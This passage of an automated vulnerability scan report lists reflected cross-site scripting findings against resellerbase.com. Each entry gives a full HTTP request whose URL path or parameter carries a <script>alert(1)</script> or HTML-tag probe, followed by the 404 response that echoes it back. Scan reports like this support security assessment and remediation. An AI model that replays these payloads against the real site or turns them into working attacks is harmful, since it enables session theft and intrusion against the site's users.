<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos91b89<script>alert(1)</script>c421ec8ce3d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.750. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1c228<script>alert(1)</script>ecd81b87b39 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images1c228<script>alert(1)</script>ecd81b87b39/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images1c228<script>alert(1)</script>ecd81b87b39/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.751. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 85c7a<script>alert(1)</script>c9cb30e49f4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating85c7a<script>alert(1)</script>c9cb30e49f4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating85c7a<script>alert(1)</script>c9cb30e49f4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.752. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b0f8a<script>alert(1)</script>805f2bd2086 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/search.phpb0f8a<script>alert(1)</script>805f2bd2086?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.phpb0f8a<script>alert(1)</script>805f2bd2086?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.753. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 96a20<a>57b204dea2e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96a20<a>57b204dea2e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96a20<a>57b204dea2e&opt=2 was not found on this server.</p>
...[SNIP]...

2.754. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f6f62<a>912b24cfcc0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...f6f62<a>912b24cfcc0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...f6f62<a>912b24cfcc0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.755. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1484b<script>alert(1)</script>7ac05c122e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1484b<script>alert(1)</script>7ac05c122e0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1484b<script>alert(1)</script>7ac05c122e0=1 was not found on this server.</p>
...[SNIP]...

2.756. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1cdf7<a>ad5aa613afc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=21cdf7<a>ad5aa613afc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=21cdf7<a>ad5aa613afc was not found on this server.</p>
...[SNIP]...

2.757. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f2ce<script>alert(1)</script>ac261366fc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication9f2ce<script>alert(1)</script>ac261366fc4/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication9f2ce<script>alert(1)</script>ac261366fc4/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.758. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2836<script>alert(1)</script>8d93a32f2f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesf2836<script>alert(1)</script>8d93a32f2f7/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf2836<script>alert(1)</script>8d93a32f2f7/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.759. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68a9a<script>alert(1)</script>4ea16b489b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos68a9a<script>alert(1)</script>4ea16b489b7/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos68a9a<script>alert(1)</script>4ea16b489b7/images/review/ was not found on this server.</p>
...[SNIP]...

2.760. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 359c4<script>alert(1)</script>1857e69c338 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images359c4<script>alert(1)</script>1857e69c338/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images359c4<script>alert(1)</script>1857e69c338/review/ was not found on this server.</p>
...[SNIP]...

2.761. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12cbc<script>alert(1)</script>7ee53d93fbf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review12cbc<script>alert(1)</script>7ee53d93fbf/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review12cbc<script>alert(1)</script>7ee53d93fbf/ was not found on this server.</p>
...[SNIP]...

2.762. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bb77<script>alert(1)</script>4bc6454923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/?1bb77<script>alert(1)</script>4bc6454923d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/?1bb77<script>alert(1)</script>4bc6454923d=1 was not found on this server.</p>
...[SNIP]...

2.763. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65ec9<script>alert(1)</script>c6da4a30542 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication65ec9<script>alert(1)</script>c6da4a30542/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication65ec9<script>alert(1)</script>c6da4a30542/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.764. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7df9f<script>alert(1)</script>a65d63c2c70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes7df9f<script>alert(1)</script>a65d63c2c70/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes7df9f<script>alert(1)</script>a65d63c2c70/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.765. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee058<script>alert(1)</script>f31599738a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosee058<script>alert(1)</script>f31599738a2/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosee058<script>alert(1)</script>f31599738a2/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.766. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 58a95<script>alert(1)</script>867dbcef982 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images58a95<script>alert(1)</script>867dbcef982/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images58a95<script>alert(1)</script>867dbcef982/review/0.gif was not found on this server.</p>
...[SNIP]...

2.767. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d1ba2<script>alert(1)</script>3f6f5fd2e90 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/reviewd1ba2<script>alert(1)</script>3f6f5fd2e90/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/reviewd1ba2<script>alert(1)</script>3f6f5fd2e90/0.gif was not found on this server.</p>
...[SNIP]...

2.768. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 429c6<script>alert(1)</script>a5270fc251a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/0.gif429c6<script>alert(1)</script>a5270fc251a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
